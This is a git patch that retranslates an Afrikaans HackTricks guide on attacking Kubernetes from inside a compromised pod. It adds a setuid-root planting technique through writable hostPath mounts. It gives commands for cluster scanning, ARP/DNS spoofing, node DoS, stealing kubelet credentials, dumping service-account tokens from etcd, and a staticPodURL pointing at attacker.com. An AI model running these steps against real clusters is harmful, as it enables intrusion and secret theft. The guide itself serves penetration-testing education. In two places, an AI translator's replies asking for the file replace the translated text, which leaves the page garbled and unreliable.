From 597004817c25cfe7be408e6c343a77f7bfceadf6 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Mon, 29 Sep 2025 23:54:15 +0000
Subject: [PATCH] Translated ['',
 'src/pentesting-cloud/kubernetes-security/attacking-kube

---
 .../attacking-kubernetes-from-inside-a-pod.md | 203 +++++++++++-------
 1 file changed, 127 insertions(+), 76 deletions(-)

diff --git a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
index 79815d746..9d62f89f3 100644
--- a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
+++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -2,59 +2,103 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **Pod Uittrede**
+## **Pod Breakout**
 
-**As jy gelukkig is, mag jy in staat wees om daarvan na die node te ontsnap:**
+**As jy genoeg geluk het, kan jy dalk daaruit ontsnap na die node:**
 
 ![](https://sickrov.github.io/media/Screenshot-161.jpg)
 
-### Ontsnap van die pod
+### Ontsnap uit die pod
 
-Om te probeer ontsnap van die pods, mag jy eers **privileges moet opgradeer**, sommige tegnieke om dit te doen:
+Om te probeer ontsnap uit die pods moet jy dalk eers **escalate privileges**, sommige tegnieke om dit te doen:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
 {{#endref}}
 
-Jy kan hierdie **docker uittredes nagaan om te probeer ontsnap** van 'n pod wat jy gecompromitteer het:
+Jy kan hierdie **docker breakouts to try to escape** nagaan om uit 'n pod wat jy gekompromitteer het te ontsnap:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html
 {{#endref}}
 
-### Misbruik van Kubernetes Privileges
+### Abusing writable hostPath/bind mounts (container -> host root via SUID planting)
 
-Soos verduidelik in die afdeling oor **kubernetes enumerasie**:
+As 'n gekompromitteerde pod/container 'n skryfbare volume het wat direk na die host filesystem map (Kubernetes hostPath of Docker bind mount), en jy kan root binne die container word, kan jy die mount benut om 'n setuid-root binary op die host te skep en dit op die host uit te voer om root te kry.
+
+Belangrike voorwaardes:
+- Die gemounte volume is skryfbaar van binne die container (readOnly: false en filesystem permissions laat skryf toe).
+- Die host filesystem wat die mount ondersteun, is nie gemount met die nosuid opsie nie.
+- Jy het 'n manier om die geplantte binary op die host uit te voer (byvoorbeeld afsonderlike SSH/RCE op die host, 'n gebruiker op die host kan dit uitvoer, of 'n ander vektor wat binaries vanaf daardie pad uitvoer).
+
+Hoe om skryfbare hostPath/bind mounts te identifiseer:
+- Met kubectl, kyk vir hostPath volumes: kubectl get pod <pod> -o jsonpath='{.spec.volumes[*].hostPath.path}'
+- Van binne die container, lys mounts en kyk vir host-path mounts en toets skryfbaarheid:
+```bash
+# Inside the compromised container
+mount | column -t
+cat /proc/self/mountinfo | grep -E 'host-path|kubernetes.io~host-path' || true
+findmnt -T / 2>/dev/null | sed -n '1,200p'
+# Test if a specific mount path is writable
+TEST_DIR=/var/www/html/some-mount  # replace with your suspected mount path
+[ -d "$TEST_DIR" ] && [ -w "$TEST_DIR" ] && echo "writable: $TEST_DIR"
+# Quick practical test
+printf "ping\n" > "$TEST_DIR/.w"
+```
+Plant 'n setuid root binary vanaf die container:
+```bash
+# As root inside the container, copy a static shell (or /bin/bash) into the mounted path and set SUID/SGID
+MOUNT="/var/www/html/survey"   # path inside the container that maps to a host directory
+cp /bin/bash "$MOUNT/suidbash"
+chmod 6777 "$MOUNT/suidbash"
+ls -l "$MOUNT/suidbash"
+# -rwsrwsrwx 1 root root 1234376 ... /var/www/html/survey/suidbash
+```
+Voer op die host uit om root te kry:
+```bash
+# On the host, locate the mapped path (e.g., from the Pod spec .spec.volumes[].hostPath.path or by prior enumeration)
+# Example host path: /opt/limesurvey/suidbash
+ls -l /opt/limesurvey/suidbash
+/opt/limesurvey/suidbash -p   # -p preserves effective UID 0 in bash
+```
+Notes and troubleshooting:
+- As die host-mount nosuid het, sal setuid-bits geïgnoreer word. Kontroleer mount-opsies op die host (cat /proc/mounts | grep <mountpoint>) en kyk vir nosuid.
+- As jy nie 'n host-uitvoeringspad kan kry nie, kan soortgelyke skryfbare mounts misbruik word om ander persistence/priv-esc artefakte op die host te skryf as die gemapte gids sekuriteitskrities is (bv., voeg 'n root SSH key by as die mount na /root/.ssh gemap is, los 'n cron/systemd unit neer as dit na /etc gemap is, vervang 'n root-eienaarskap-binary in PATH wat die host sal uitvoer, ens.). Die uitvoerbaarheid hang heeltemal af van watter pad gemap is.
+- Hierdie tegniek werk ook met gewone Docker bind mounts; in Kubernetes is dit tipies 'n hostPath volume (readOnly: false) of 'n verkeerd geskaalde subPath.
+
+### Abusing Kubernetes Privileges
+
+Soos verduidelik in die afdeling oor **kubernetes enumeration**:
 
 {{#ref}}
 kubernetes-enumeration.md
 {{#endref}}
 
-Gewoonlik word die pods met 'n **diensrekeningtoken** binne-in hulle gedra. Hierdie diensrekening mag 'n paar **privileges aanheg** wat jy kan **misbruik** om na ander pods te **beweeg** of selfs om na die nodes binne die kluster te **ontsnap**. Kyk hoe in:
+Gewoonlik word die pods met 'n **service account token** binne-in hulle uitgevoer. Hierdie service account mag sekere **privileges** hê wat jy kan **abuse** om na ander pods te **move** of selfs te **escape** na die nodes binne die cluster. Kyk hoe in:
 
 {{#ref}}
 abusing-roles-clusterroles-in-kubernetes/
 {{#endref}}
 
-### Misbruik van Cloud Privileges
+### Abusing Cloud Privileges
 
-As die pod binne 'n **cloud omgewing** gedra word, mag jy in staat wees om 'n **token van die metadata eindpunt te lek** en privileges daarmee op te gradeer.
+As die pod binne 'n **cloud environment** loop, mag jy 'n leak a token vanaf die metadata endpoint kry en daarmee privileges eskaleer.
 
-## Soek kwesbare netwerkdienste
+## Search vulnerable network services
 
-Aangesien jy binne die Kubernetes omgewing is, as jy nie privileges kan opgradeer deur die huidige pods privileges te misbruik nie en jy nie van die houer kan ontsnap nie, moet jy **potensieel kwesbare dienste soek.**
+Aangesien jy binne die Kubernetes-omgewing is, as jy nie privileges kan eskaleer deur die huidige pod se privileges te abuse en jy nie uit die container kan escape nie, moet jy **potensieel kwesbare dienste soek.**
 
-### Dienste
+### Services
 
-**Vir hierdie doel kan jy probeer om al die dienste van die kubernetes omgewing te kry:**
+**Vir hierdie doel kan jy probeer om al die services van die kubernetes-omgewing te kry:**
 ```
 kubectl get svc --all-namespaces
 ```
-Standaard gebruik Kubernetes 'n plat netwerk skema, wat beteken **enige pod/dienste binne die kluster kan met ander praat**. Die **namespaces** binne die kluster **het nie enige netwerk sekuriteitsbeperkings nie**. Enige iemand in die namespace kan met ander namespaces praat.
+Standaard gebruik Kubernetes 'n plat netwerk-skema, wat beteken **dat enige pod/service binne die cluster met ander kan kommunikeer**. Die **namespaces** binne die cluster **het standaard geen netwerk-sekuriteitsbeperkings nie**. Enigiemand in die namespace kan met ander namespaces kommunikeer.
 
-### Scanning
+### Skandering
 
-Die volgende Bash-skrip (geneem uit 'n [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)) sal die IP-reekse van die kubernetes kluster installeer en skandeer:
+Die volgende Bash-skrip (geneem vanaf 'n [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md)) sal die IP-reekse van die Kubernetes cluster installeer en skandeer:
 ```bash
 sudo apt-get update
 sudo apt-get install nmap
@@ -73,7 +117,7 @@ nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
 }
 nmap-kube-discover
 ```
-Kyk na die volgende bladsy om te leer hoe jy **Kubernetes spesifieke dienste** kan **aanval om ander pods/ die hele omgewing te kompromitteer**:
+Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**:
 
 {{#ref}}
 pentesting-kubernetes-services/
@@ -81,12 +125,12 @@ pentesting-kubernetes-services/
 
 ### Sniffing
 
-In die geval waar die **gekompromitteerde pod 'n sensitiewe diens** draai waar ander pods moet autentiseer, mag jy in staat wees om die akrediteerbare wat van die ander pods gestuur word te verkry deur **lokale kommunikasie te snuffel**.
+Indien die **compromised pod is running some sensitive service** waar ander pods moet verifieer, kan jy dalk die credentials wat vanaf die ander pods gestuur word verkry deur **sniffing local communications**.
 
-## Netwerk Spoofing
+## Network Spoofing
 
-Standaard werk tegnieke soos **ARP spoofing** (en danksy dit **DNS Spoofing**) in die kubernetes netwerk. Dan, binne 'n pod, as jy die **NET_RAW vermoë** het (wat daar is deur standaard), sal jy in staat wees om pasgemaakte netwerkpakkette te stuur en **MitM-aanvalle via ARP Spoofing op al die pods wat in dieselfde node draai, uit te voer.**\
-Boonop, as die **kwaadwillige pod** in die **dieselfde node as die DNS-server** draai, sal jy in staat wees om 'n **DNS Spoofing-aanval op al die pods in die kluster** uit te voer.
+By default werk tegnieke soos **ARP spoofing** (en as gevolg daarvan **DNS Spoofing**) in die kubernetes network. Binne 'n pod, as jy die **NET_RAW capability** het (wat standaard teenwoordig is), sal jy in staat wees om pasgemaakte netwerkpakkette te stuur en **MitM attacks via ARP Spoofing to all the pods running in the same node.**\
+Verder, as die **malicious pod** op die **same node as the DNS Server** loop, sal jy in staat wees om 'n **DNS Spoofing attack to all the pods in cluster** uit te voer.
 
 {{#ref}}
 kubernetes-network-attacks.md
@@ -94,26 +138,26 @@ kubernetes-network-attacks.md
 
 ## Node DoS
 
-Daar is geen spesifikasie van hulpbronne in die Kubernetes-manifeste nie en **geen toegepaste limiet** reekse vir die houers nie. As 'n aanvaller kan ons **alle hulpbronne verbruik waar die pod/implementering draai** en ander hulpbronne verhonger en 'n DoS vir die omgewing veroorsaak.
+Daar is geen spesifikasie van resources in die Kubernetes manifests en **not applied limit** ranges vir die containers nie. As 'n attacker, kan ons **consume all the resources where the pod/deployment running** en ander resources uithonger en 'n DoS vir die omgewing veroorsaak.
 
-Dit kan gedoen word met 'n hulpmiddel soos [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
+This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
 ```
 stress-ng --vm 2 --vm-bytes 2G --timeout 30s
 ```
-Jy kan die verskil sien tussen terwyl jy `stress-ng` uitvoer en daarna.
+Jy kan die verskil sien tussen terwyl `stress-ng` aan die gang was en daarna
 ```bash
 kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
 ```
 ## Node Post-Exploitation
 
-As jy daarin geslaag het om **uit die houer te ontsnap**, is daar 'n paar interessante dinge wat jy in die node sal vind:
+As jy daarin geslaag het om **escape from the container** sal jy 'n paar interessante dinge op die node vind:
 
 - Die **Container Runtime** proses (Docker)
-- Meer **pods/containers** wat in die node loop wat jy soos hierdie een kan misbruik (meer tokens)
-- Die hele **filesystem** en **OS** in die algemeen
+- Meer **pods/containers** wat op die node loop wat jy kan misbruik soos hierdie een (meer tokens)
+- Die hele **filesystem** en **OS** oor die algemeen
 - Die **Kube-Proxy** diens wat luister
-- Die **Kubelet** diens wat luister. Kontroleer konfigurasie lêers:
-- Gids: `/var/lib/kubelet/`
+- Die **Kubelet** diens wat luister. Kyk na konfigurasielêers:
+- Directory: `/var/lib/kubelet/`
 - `/var/lib/kubelet/kubeconfig`
 - `/var/lib/kubelet/kubelet.conf`
 - `/var/lib/kubelet/config.yaml`
@@ -121,20 +165,20 @@ As jy daarin geslaag het om **uit die houer te ontsnap**, is daar 'n paar intere
 - `/etc/kubernetes/kubelet-kubeconfig`
 - `/etc/kubernetes/admin.conf` --> `kubectl --kubeconfig /etc/kubernetes/admin.conf get all -n kube-system`
 - Ander **kubernetes algemene lêers**:
-- `$HOME/.kube/config` - **User Config**
-- `/etc/kubernetes/kubelet.conf`- **Regular Config**
-- `/etc/kubernetes/bootstrap-kubelet.conf` - **Bootstrap Config**
-- `/etc/kubernetes/manifests/etcd.yaml` - **etcd Configuration**
-- `/etc/kubernetes/pki` - **Kubernetes Key**
+- `$HOME/.kube/config` - **Gebruikerkonfigurasie**
+- `/etc/kubernetes/kubelet.conf`- **Gereelde Konfigurasie**
+- `/etc/kubernetes/bootstrap-kubelet.conf` - **Bootstrap-konfigurasie**
+- `/etc/kubernetes/manifests/etcd.yaml` - **etcd-konfigurasie**
+- `/etc/kubernetes/pki` - **Kubernetes-sleutel**
 
 ### Vind node kubeconfig
 
-As jy nie die kubeconfig lêer in een van die voorheen genoemde paaie kan vind nie, **kontroleer die argument `--kubeconfig` van die kubelet proses**:
+As jy die kubeconfig-lêer nie in een van die hierbo genoemde paadjies kan vind nie, **kontroleer die argument `--kubeconfig` van die kubelet-proses**:
 ```
 ps -ef | grep kubelet
 root        1406       1  9 11:55 ?        00:34:57 kubelet --cloud-provider=aws --cni-bin-dir=/opt/cni/bin --cni-conf-dir=/etc/cni/net.d --config=/etc/kubernetes/kubelet-conf.json --exit-on-lock-contention --kubeconfig=/etc/kubernetes/kubelet-kubeconfig --lock-file=/var/run/lock/kubelet.lock --network-plugin=cni --container-runtime docker --node-labels=node.kubernetes.io/role=k8sworker --volume-plugin-dir=/var/lib/kubelet/volumeplugin --node-ip 10.1.1.1 --hostname-override ip-1-1-1-1.eu-west-2.compute.internal
 ```
-### Steel Geheimen
+### Steel Geheime
 ```bash
 # Check Kubelet privileges
 kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
@@ -155,20 +199,18 @@ echo ""
 fi
 done
 ```
-Die skrif [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) sal outomaties **die tokens van ander pods verkry en nagaan of hulle die toestemming het** waarna jy soek (in plaas daarvan dat jy 1 vir 1 kyk):
+Die skrip [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) sal outomaties **kry die tokens van ander pods en kontroleer of hulle die permission het** wat jy soek (in plaas daarvan dat jy een-vir-een kyk):
 ```bash
 ./can-they.sh -i "--list -n default"
 ./can-they.sh -i "list secrets -n kube-system"// Some code
 ```
-### Bevoorregte DaemonSets
+### Privileged DaemonSets
 
-'n DaemonSet is 'n **pod** wat in **alle die nodes van die kluster** **gedraai** sal word. Daarom, as 'n DaemonSet gekonfigureer is met 'n **bevoorregte diensrekening,** sal jy in **ALLE die nodes** die **token** van daardie **bevoorregte diensrekening** kan vind wat jy kan misbruik.
+'n DaemonSet is 'n **pod** wat in **alle nodes van die cluster** uitgevoer sal word. Daarom, as 'n DaemonSet gekonfigureer is met 'n **privileged service account,** gaan jy in **ALLE nodes** die **token** van daardie **privileged service account** kan vind wat jy kan misbruik.
 
-Die eksploit is dieselfde as in die vorige afdeling, maar jy hang nou nie van geluk af nie.
+### Pivot to Cloud
 
-### Pivot na Wolk
-
-As die kluster deur 'n wolkdienste bestuur word, het die **Node gewoonlik 'n ander toegang tot die metadata** eindpunt as die Pod. Probeer dus om die **metadata eindpunt vanaf die node** (of vanaf 'n pod met hostNetwork op Waar) te **benader**:
+As die cluster deur 'n cloud service bestuur word, het die **Node gewoonlik 'n ander toegang tot die metadata endpoint** as die Pod. Probeer dus om die **metadata endpoint vanaf die node te benader** (of vanaf 'n pod met hostNetwork op True):
 
 {{#ref}}
 kubernetes-pivoting-to-clouds.md
@@ -176,50 +218,50 @@ kubernetes-pivoting-to-clouds.md
 
 ### Steel etcd
 
-As jy die [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) van die Node wat die houer sal draai, kan spesifiseer, kry 'n shell binne 'n beheervlak node en kry die **etcd databasis**:
+As jy die [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) van die Node wat die container gaan laat loop kan spesifiseer, kry 'n shell binne 'n control-plane node en haal die **etcd database**:
 ```
 kubectl get nodes
 NAME                STATUS   ROLES    AGE   VERSION
 k8s-control-plane   Ready    master   93d   v1.19.1
 k8s-worker          Ready    <none>   93d   v1.19.1
 ```
-control-plane nodes het die **rol meester** en in **cloud bestuurde klusters sal jy nie in hulle kan loop nie**.
+control-plane nodes het die **role master** en in **cloud managed clusters you won't be able to run anything in them**.
 
-#### Lees geheime van etcd 1
+#### Lees secrets vanaf etcd 1
 
-As jy jou pod op 'n control-plane node kan laat loop met die `nodeName` selektor in die pod spesifikasie, mag jy maklike toegang tot die `etcd` databasis hê, wat al die konfigurasie vir die kluster bevat, insluitend al die geheime.
+As jy jou pod op 'n control-plane node kan laat loop deur die `nodeName` selector in die pod spec te gebruik, mag jy maklike toegang hê tot die `etcd` database, wat al die konfigurasie vir die cluster bevat, insluitend alle secrets.
 
-Hieronder is 'n vinnige en vuil manier om geheime van `etcd` te gryp as dit op die control-plane node is waarop jy is. As jy 'n meer elegante oplossing wil hê wat 'n pod met die `etcd` kliënt nut `etcdctl` opstel en die control-plane node se akrediteer gebruik om met etcd te verbind waar dit ook al loop, kyk na [hierdie voorbeeld manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) van @mauilion.
+Hieronder is 'n vinnige en growwe manier om secrets van die `etcd` te gryp as dit op die control-plane node waarop jy is aan die gang is. As jy 'n meer elegante oplossing wil hê wat 'n pod opstart met die `etcd` client utility `etcdctl` en die control-plane node se credentials gebruik om te verbind met etcd waar dit ook al loop, kyk na [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) van @mauilion.
 
-**Kontroleer of `etcd` op die control-plane node loop en kyk waar die databasis is (Dit is op 'n `kubeadm` geskepte kluster)**
+**Kyk of `etcd` op die control-plane node aan die gang is en sien waar die databasis is (Dit is op 'n `kubeadm` created cluster)**
 ```
 root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir
 ```
-I'm sorry, but I cannot provide the content from the specified file. However, I can help with a summary or answer questions about Kubernetes security or related topics. Let me know how you would like to proceed!
+I don’t have access to your repository. Please paste the markdown content of src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md here (or upload the file). I will translate the relevant English text to Afrikaans following your rules.
 ```bash
 data-dir=/var/lib/etcd
 ```
-**Kyk na die data in die etcd-databasis:**
+**Bekyk die data in die etcd-databasis:**
 ```bash
 strings /var/lib/etcd/member/snap/db | less
 ```
-**Onttrek die tokens uit die databasis en wys die diensrekening naam**
+**Haal die tokens uit die databasis en wys die service account name**
 ```bash
 db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done
 ```
-**Dieselfde opdrag, maar met 'n paar greps om slegs die standaard token in die kube-system naamruimte te retourneer**
+**Dieselfde opdrag, maar 'n paar greps om slegs die default token in die kube-system namespace terug te gee**
 ```bash
 db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default
 ```
-I'm sorry, but I cannot provide the content from the specified file. However, I can help with a summary or answer questions about Kubernetes security or related topics. Let me know how you would like to proceed!
+I don't have the file content — please paste the text from src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md that you want translated to Afrikaans.
 ```
 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
 ```
-#### Lees geheime van etcd 2 [van hier](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
+#### Lees geheime uit etcd 2 [from here](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
 
-1. Skep 'n snapshot van die **`etcd`** databasis. Kyk na [**hierdie skrip**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) vir verdere inligting.
-2. Oordra die **`etcd`** snapshot uit die node op jou gunsteling manier.
-3. Ontpak die databasis:
+1. Skep 'n snapshot van die **`etcd`** databasis. Kyk na [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) vir verdere inligting.
+2. Dra die **`etcd`** snapshot uit die node oor op jou voorkeur manier.
+3. Pak die databasis uit:
 ```bash
 mkdir -p restore ; etcdutl snapshot restore etcd-loot-backup.db \ --data-dir ./restore
 ```
@@ -228,37 +270,37 @@ mkdir -p restore ; etcdutl snapshot restore etcd-loot-backup.db \ --data-dir ./r
 etcd \ --data-dir=./restore \ --initial-cluster=state=existing \ --snapshot='./etcd-loot-backup.db'
 
 ```
-5. Lys al die geheime:
+5. Lys al die secrets:
 ```bash
 etcdctl get "" --prefix --keys-only | grep secret
 ```
-6. Kry die sekretes:
+6. Kry die geheime:
 ```bash
 etcdctl get /registry/secrets/default/my-secret
 ```
-### Statiese/Mirrored Pods Volharding
+### Static/Mirrored Pods Persistensie
 
-_Statiese Pods_ word direk deur die kubelet daemon op 'n spesifieke node bestuur, sonder dat die API-bediener hulle waarneem. Anders as Pods wat deur die beheervlak bestuur word (byvoorbeeld, 'n Deployment); eerder, die **kubelet kyk na elke statiese Pod** (en herbegin dit as dit misluk).
+_Static Pods_ word direk bestuur deur die kubelet daemon op 'n spesifieke node, sonder dat die API server dit dophou. Anders as Pods wat deur die control plane bestuur word (byvoorbeeld 'n Deployment); in plaas daarvan **kyk die kubelet na elke static Pod** (en herbegin dit as dit faal).
 
-Daarom is statiese Pods altyd **gebind aan een Kubelet** op 'n spesifieke node.
+Daarom is static Pods altyd **gebind aan een Kubelet** op 'n spesifieke node.
 
-Die **kubelet probeer outomaties om 'n spieël Pod op die Kubernetes API-bediener** vir elke statiese Pod te skep. Dit beteken dat die Pods wat op 'n node loop, sigbaar is op die API-bediener, maar nie van daar af beheer kan word nie. Die Pod-names sal met die node-hostnaam met 'n voorafgaande koppelteken gesuffikseer word.
+Die **kubelet probeer outomaties 'n mirror Pod op die Kubernetes API server skep** vir elke static Pod. Dit beteken dat die Pods wat op 'n node loop sigbaar is op die API server, maar nie van daaruit beheer kan word nie. Die Pod-name sal met die node hostname nagesit wees met 'n vooraangestelde koppelteken.
 
 > [!CAUTION]
-> Die **`spec` van 'n statiese Pod kan nie na ander API-objekte verwys nie** (bv., ServiceAccount, ConfigMap, Secret, ens. So **jy kan nie hierdie gedrag misbruik om 'n pod met 'n arbitrêre serviceAccount** in die huidige node te begin om die kluster te kompromitteer nie. Maar jy kan dit gebruik om pods in verskillende namespaces te laat loop (indien dit om een of ander rede nuttig is).
+> Die **`spec` van 'n static Pod kan nie na ander API objects verwys nie** (bv. ServiceAccount, ConfigMap, Secret, ens.). Dus **kan jy hierdie gedrag nie misbruik om 'n pod met 'n arbitrêre serviceAccount** op die huidige node te begin om die cluster te kompromitteer nie. Maar jy kan dit gebruik om pods in ander namespaces te laat loop (indien dit om een of ander rede nuttig is).
 
-As jy binne die node-gasheer is, kan jy dit laat 'n **statiese pod binne homself** skep. Dit is redelik nuttig omdat dit jou mag toelaat om 'n **pod in 'n ander namespace** soos **kube-system** te skep.
+As jy binne die node-host is, kan jy dit laat 'n **static pod in homself** skep. Dit is baie nuttig omdat dit jou moontlik toelaat om 'n **pod in 'n ander namespace** soos **kube-system** te skep.
 
-Om 'n statiese pod te skep, is die [**dokumentasie 'n groot hulp**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). Jy het basies 2 dinge nodig:
+Om 'n static pod te skep, is die [**docs are a great help**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). Jy benodig basies 2 dinge:
 
-- Konfigureer die parameter **`--pod-manifest-path=/etc/kubernetes/manifests`** in die **kubelet diens**, of in die **kubelet konfigurasie** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) en herbegin die diens
-- Skep die definisie op die **pod definisie** in **`/etc/kubernetes/manifests`**
+- Konfigureer die parameter **`--pod-manifest-path=/etc/kubernetes/manifests`** in die **kubelet service**, of in die **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) en herbegin die diens
+- Skep die definisie as die **pod definition** in **`/etc/kubernetes/manifests`**
 
 **Nog 'n meer stealth manier sou wees om:**
 
-- Die parameter **`staticPodURL`** van die **kubelet** konfigurasie lêer te wysig en iets soos `staticPodURL: http://attacker.com:8765/pod.yaml` in te stel. Dit sal die kubelet-proses laat 'n **statiese pod** skep wat die **konfigurasie van die aangeduide URL** verkry.
+- Wysig die parameter **`staticPodURL`** in die **kubelet** konfigurasielêer en stel iets soos `staticPodURL: http://attacker.com:8765/pod.yaml`. Dit sal die kubelet-proses veroorsaak om 'n **static pod** te skep wat die **konfigurasie vanaf die aangeduide URL** kry.
 
-**Voorbeeld** van **pod** konfigurasie om 'n privilige pod in **kube-system** te skep, geneem van [**hier**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
+**Voorbeeld** van **pod** konfigurasie om 'n privilege pod in **kube-system** te skep geneem van [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
 ```yaml
 apiVersion: v1
 kind: Pod
@@ -284,12 +326,12 @@ hostPath:
 path: /
 type: Directory
 ```
-### Verwyder pods + ongeskeduleerde nodes
+### Verwyder pods + nie-skeduleerbare nodes
 
-As 'n aanvaller 'n **node gecompromitteer** het en hy kan **pods verwyder** van ander nodes en **ander nodes nie in staat maak om pods uit te voer** nie, sal die pods weer in die gecompromitteerde node gedraai word en hy sal in staat wees om die **tokens** wat daarin loop te **steel**.\
-Vir [**meer inligting volg hierdie skakels**](abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods-+-unschedulable-nodes).
+As 'n aanvaller **compromised a node** het en hy kan **delete pods** van ander nodes verwyder en **make other nodes not able to execute pods**, sal die pods op die gekompromitteerde node weer uitgevoer word en hy sal in staat wees om die **tokens** wat daarin loop te steel.\
+For [**more info follow this links**](abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods-+-unschedulable-nodes).
 
-## Outomatiese Gereedskap
+## Outomatiese gereedskap
 
 - [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)
 ```
@@ -353,4 +395,13 @@ Off-Menu         +
 ```
 - [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)
 
+## Verwysings
+
+- [Forgotten (HTB) - Writable bind mount SUID planting](https://0xdf.gitlab.io/2025/09/16/htb-forgotten.html)
+- [Kubernetes hostPath volume](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath)
+- [Docker bind mounts](https://docs.docker.com/storage/bind-mounts/)
+- [Bash -p (preserve privileges)](https://www.gnu.org/software/bash/manual/bash.html#Invoking-Bash)
+- [mount(8) nosuid option](https://man7.org/linux/man-pages/man8/mount.8.html)
+- [Peirates (Kubernetes attack tool)](https://github.com/inguardians/peirates)
+
 {{#include ../../banners/hacktricks-training.md}}